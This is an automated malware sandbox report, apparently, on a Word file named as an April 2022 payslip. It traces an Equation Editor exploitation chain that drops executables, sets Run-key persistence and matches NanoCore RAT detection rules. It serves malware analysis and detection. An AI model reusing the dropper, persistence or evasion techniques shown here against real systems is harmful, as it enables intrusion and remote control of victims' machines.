      Source: 7.2.jqenyeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: jqenyeo.exe PID: 808, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: jqenyeo.exe PID: 324, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B13D2 NtQuerySystemInformation,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B1397 NtQuerySystemInformation,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yslip_APR_2022.docJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/15@8/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_00401482 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drOLE document summary: edited time not present or 0
      Source: Payslip_APR_2022.docVirustotal: Detection: 34%
      Source: Payslip_APR_2022.docReversingLabs: Detection: 24%
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dll.exe C:\Users\user\AppData\Roaming\dll.exe
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dll.exe C:\Users\user\AppData\Roaming\dll.exe
      Source: C:\Users\user\AppData\Roaming\dll.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeProcess created: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
      Source: C:\Users\user\AppData\Roaming\dll.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B1192 AdjustTokenPrivileges,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_043B115B AdjustTokenPrivileges,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5E26.tmpJump to behavior
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_004021AA CoCreateInstance,
      Source: C:\Users\user\AppData\Roaming\dll.exeCode function: 4_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{b07368c6-c9e6-43bc-939d-00b8dbf662e7}
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: jqenyeo.exe, 00000005.00000003.922226996.0000000002660000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000005.00000003.924894194.00000000031E0000.00000004.00001000.00020000.00000000.sdmp
      Source: ~WRF{E418C216-F903-4F08-9D65-89DE9868688C}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Data Obfuscation

      barindex
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D4D70 pushad ; retf
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002DC09C pushad ; retf
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_002D4D90 pushad ; retf
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_00402565 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_00401F56 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_0027989B push ecx; retf 0027h
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 7_2_002C1F0B push es; ret
      Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeCode function: 8_2_00402565 push ecx; ret
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 7.2.jqenyeo.exe.1ed0000.4.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Roaming\dll.exeFile created: C:\Users\user\AppData\Local\Temp\jqenyeo.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\jnstp[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\dll.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile created: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiarJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wboyuqknqhxiarJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Users\user\AppData\Local\Temp\jqenyeo.exe:Zone.Identifier read attributes | delete
      Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeCode function: 5_2_004031FA RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
